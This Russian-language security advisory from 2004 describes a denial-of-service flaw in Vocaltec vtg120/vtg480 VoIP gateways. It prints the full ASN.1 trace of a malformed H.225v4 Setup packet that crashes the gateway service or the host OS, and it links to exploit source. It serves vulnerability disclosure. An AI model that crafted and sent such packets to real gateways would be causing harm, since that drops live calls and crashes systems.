| Дата публикации: | 24.05.2004 |
| Дата изменения: | 17.10.2006 |
| Всего просмотров: | 4928 |
| Опасность: | Высокая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Vocaltec VoIP vtg120, vtg480
Описание: При разборе пакетов VoIP-сигнализации с 4ой версией протокола H.225, содержащих инструкции tunnelledSignallingMessage c id = tunnelledProtocolAlternateID наблюдаются сбои в работе VoIP-шлюзов Vocaltec. Многократная посылка ( ~10 раз) такого пакета приводит к сбоям от отключения/перезагрузки vtgw-сервиса (с разрывом и потерей всех текущих звонков), до выпадения OS Windows NT 4 (которая используется на таких шлюзах) в BSOD. Пример ASN.1 трассы пакета:
{
q931pdu = {
protocolDiscriminator = 8
callReference = 4
from = originator
messageType = Setup
IE: Bearer-Capability = {
80 90 a5 ...
}
IE: Calling-Party-Number = {
81 31 32 33 34 35 36 37 38 39 30 .1234567890
}
IE: Called-Party-Number = {
81 31 32 33 34 31 32 33 34 35 36 37 .12341234567
}
IE: User-User = { decode to h225pdu }
}
h225pdu = {
h323_uu_pdu = {
h323_message_body = setup {
protocolIdentifier = 0.0.8.2250.0.4 <<-------- H.225v4
sourceInfo = {
vendor = {
vendor = {
t35CountryCode = 1
t35Extension = 2
manufacturerCode = 3
}
}
gateway = {
protocol = 1 entries {
[0]=voice {
supportedPrefixes = 0 entries {
}
}
}
}
mc = FALSE
undefinedNode = FALSE
}
activeMC = FALSE
conferenceID = 16 octets {
61 62 63 64 65 66 67 68 61 62 63 64 65 66 67 68
}
conferenceGoal = create <<null>>
callType = pointToPoint <<null>>
sourceCallSignalAddress = ipAddress {
ip = 4 octets {
ac 10 01 01
}
port = 666
}
callIdentifier = {
guid = 16 octets {
62 62 63 64 65 66 67 68 61 62 63 64 65 66 67 68
}
}
fastStart = 2 entries {
[0]= 18 octets {
00 00 00 0d 40 01 80 0a 04 00 01 00 ac 10 01 01
47 f1
}
[1]= 29 octets {
40 00 00 06 04 01 00 4d 40 01 80 11 14 00 01 00
ac 10 01 01 47 f0 00 ac 10 01 01 47 f1
}
}
mediaWaitForConnect = FALSE
canOverlapSend = FALSE
multipleCalls = TRUE
maintainConnection = TRUE
symmetricOperationRequired = <<null>>
}
h245Tunneling = TRUE
nonStandardControl = 1 entries {
[0]={
nonStandardIdentifier = h221NonStandard {
t35CountryCode = 1
t35Extension = 2
manufacturerCode = 3
}
data = {...}
}
}
tunnelledSignallingMessage = {
tunnelledProtocolID = {
id = tunnelledProtocolAlternateID {
protocolType = "abcd"
}
}
messageContent = 1 entries {
[0]= {...}
}
}
}
}
}
Причем для многих современных VoIP-шлюзов (к примеру, Cisco 5350), подобный метод построения пакетов является нормой по умолчанию. Данная уязвимость протестированна на наличие в шлюзах vtg120, vtg480, но логично предположить (вследствие общности архитектуры шлюзов) что проявляется и на менее распространенных моделях. Техническая служба компании Vocaltec никак не хочет реагировать на заявления о данной уязвимости.
Уязвимость обнаружил Tagoff Eugene Пример/Эксплоит: http://www.securitylab.ru/_Exploits/2004/05/killvoc-small.c
URL производителя: http://www.vocaltec.com Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.
|